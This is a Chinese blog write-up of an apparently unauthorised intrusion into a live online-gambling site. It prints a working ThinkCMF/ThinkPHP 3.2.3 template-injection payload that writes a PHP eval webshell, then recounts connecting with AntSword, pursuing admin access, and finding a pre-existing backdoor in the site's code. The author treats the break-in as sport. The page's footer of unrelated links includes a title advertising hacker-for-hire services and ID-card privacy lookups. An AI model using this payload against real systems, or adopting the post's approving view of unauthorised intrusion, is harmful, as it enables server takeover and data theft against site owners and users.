渗透小计之「竟然有人在网赌平台代码里下毒」

访客4年前黑客文章701

print by 猩猩安全团队——作者:hurnme、flyingdemon

引言

记一次对某网D平台的渗透,以及发现其后台源码存在后门的过程

确定目标CMS

拿到其ip之后先信息搜集搜了了一波,确定目标使用的是ThinkCMF。

1608950324_5fe6a23450ebaf27b1806.png!small?1608950324080

进去之后在url处构造报错

1608949555_5fe69f33c999ae566e1cd.png!small?1608949555635

写入一句话

查看到ThinkPHP版本崴3.2.3,那么对应的thinkCMF版本应该存在前台getshell的洞。废话不多说,直接构造payload一发入魂。

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('shell.php','<?php @eval($_POST[" ***  *** 521"]);?>')</php>

写入shell之后连接蚁剑,直接拿下

1608949768_5fe6a008065c146cdc01d.png!small?1608949767848

鄙人在渗透的过程中一直有一个习惯,那就是无论如何都要拿到后台管理员权限,不拿后台权限就浑身不得劲,即使拿下了主机,也是吃嘛嘛不香。没拿到后台就拿下主机,那和没确定关系就 *** 有什么区别!

1608950091_5fe6a14bedb97de6b3050.png!small?1608950091964

进入♂后台

一开始的思路是读取其config.php文件连接他的数据库,在拿到了数据库账号和密码的时候怎么连也连不上去,小伙伴提供了另一条思路,修改后台登录逻辑,直捣黄龙。

正在我要修改后台登录逻辑的时,浏览代码的过程中无意之中发现了一个好玩的线索。

1608950289_5fe6a211ecb71294db37e.png!small?1608950289732

这。。。这TM。。。有人在代码里下毒。

拿着不知道是哪位好心人留下的后门,含泪登录了后台。

1608950667_5fe6a38b3a8f9a6467892.png!small?1608950667016

帮这个主机免费做了一次入侵检测,没有发现我们进入之前被入侵的痕迹,盲猜可能是这个平台自带后门。


相关文章

诚信黑客先做事后付款_身份证能查到哪些隐私

你挣钱是要一个过程还是一个结果 努力挣钱的目的是服务社会,成就自我,实现人生价值。 劳动是为了创造财富,不是拥有财富,一开始挣钱是为了能满足生活需要,后来钱多了,好像钱就没有意义了。。 每天辛苦奔波,...

什么动物吃仙人掌都不觉得扎嘴 蚂蚁庄园2020年5月25日答案

什么动物吃仙人掌都不觉得扎嘴 蚂蚁庄园2020年5月25日答案

蚂蚁庄园5月25日每日一题来了,给我小伙伴准备好接题了吗?今天的问题就是什么动物吃仙人掌都不觉得扎嘴?各位小伙伴知道这个小吃货是什么动物吗?赶快跟随小编一起了解一下吧。 5月25日每日一答:...

毒液2不在中国上映(毒液2中国内地不上映)

毒液2不在中国上映(毒液2中国内地不上映)

本文导读目录: 1、毒液2什么时候上映 2、毒液2还会在中国上映吗?会在什么时候? 3、《毒液》2会不会在中国上映? 4、《毒液2》角色海报曝光,是否有望在国内上映? 5、《毒液2》推...

老婆大人加盟店费用是多少,老婆大人零食店前

老婆大人加盟店费用是多少,老婆大人零食店前

这两年零食店加盟非常火爆,一朋友看到单位附近的老婆大人零食店经常出现排队结账的场景,跃跃欲试,打算创业加盟。然而朋友在查阅相关信息时却发现,各大网站的老婆大人零食店广告铺天盖地,都称自己是正宗的老...

剑与远征霜息冰原7级凤凰怎么打?剑与远征霜息冰原7级凤凰打法

剑与远征霜息冰原7级凤凰怎么打?剑与远征霜息冰原7级凤凰打法

在剑与远征游戏中不少小伙伴们都还没有打过霜息冰原7级凤凰,那么剑与远征霜息冰原7级凤凰怎么打呢?下面小编就为大家带来剑与远征霜息冰原7级凤凰打法攻略,跟小编一起去看看吧。 剑与远征霜息冰原7级凤凰攻...

时事评论网(时事评论2021最新5篇)

时事评论网(时事评论2021最新5篇) 近期时事热点传播渠道有很多,像社交媒体百思特网软件、新闻网站、资讯平台、公众号等等,但并不是每一个时事热点传播渠道都能查找到近期时事热点评论及舆情数据信息。那...